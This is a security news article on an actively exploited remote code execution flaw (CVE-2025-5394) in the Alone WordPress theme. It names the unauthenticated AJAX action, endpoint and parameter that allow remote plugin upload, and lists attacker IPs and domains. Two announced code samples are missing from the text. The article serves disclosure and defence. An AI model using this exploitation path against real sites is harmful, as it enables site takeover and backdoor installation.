WordPress Theme RCE Vulnerability Actively Exploited to Take Full Site Control
A critical remote code execution (RCE) vulnerability in the popular “Alone” WordPress theme is being actively exploited by attackers to gain complete control of vulnerable websites.
The vulnerability, assigned CVE-2025-5394 with a maximum CVSS score of 9.8, affects over 9,000 sites using versions 7.8.3 and below of the charity-focused theme.
Key Takeaways
1. Critical RCE flaw in the Alone WordPress theme allows full site takeover.
2. 120,900+ active attacks deploying malicious backdoors since July 12th.
3. Update immediately if using older versions.
Technical Details of WordPress Plugin Vulnerability
The vulnerability stems from a missing capability check in the alone_import_pack_install_plugin() function, which handles plugin installations during theme setup.
The flawed code allows unauthenticated attackers to exploit the wp_ajax_nopriv_alone_import_pack_install_plugin AJAX action to upload arbitrary files disguised as plugins from remote sources.
The vulnerable function processes POST data without proper authentication:
This design flaw enables attackers to install malicious plugins containing webshells and backdoors by sending crafted requests to /wp-admin/admin-ajax.php?action=alone_import_pack_install_plugin.
The vulnerability allows both local plugin slugs and remote sources via the plugin_source parameter, making exploitation trivial for cybercriminals.
| Risk Factors | Details |
| Affected Products | Alone – Charity Multipurpose Non-profit WordPress Theme ≤ 7.8.3 |
| Impact | Remote Code Execution (RCE), Complete Site Takeover |
| Exploit Prerequisites | Unauthenticated exploitation possible |
| CVSS 3.1 Score | 9.8 (Critical) |
Theme RCE Vulnerability Actively Exploitation
Exploitation began on July 12th, 2025, two days before the vulnerability’s public disclosure, indicating attackers monitor software patches for newly fixed security issues.
Wordfence security researchers have documented over 120,900 blocked exploit attempts since monitoring began.
Attackers are deploying sophisticated malware through malicious zip files with names like wp-classic-editor.zip and background-image-cropper.zip. One captured backdoor sample demonstrates typical obfuscation techniques:
The most active attacking IP addresses include 193.84.71.244 (39,900+ requests) and 87.120.92.24 (37,100+ requests). Malicious domains hosting exploit payloads include cta.imasync[.]com and dari-slideshow[.]ru.
Website administrators must immediately update to the Alone theme version 7.8.5 or later, which patches the vulnerability. Wordfence firewall users received protection rules on May 30th, 2025, with free tier users protected from June 29th.
Security teams should examine /wp-content/plugins and /wp-content/upgrade directories for suspicious plugin installations and review access logs for requests matching the exploit pattern.
Integrate ANY.RUN TI Lookup with your SIEM or SOAR To Analyses Advanced Threats -> Try 50 Free Trial Searches
Source link
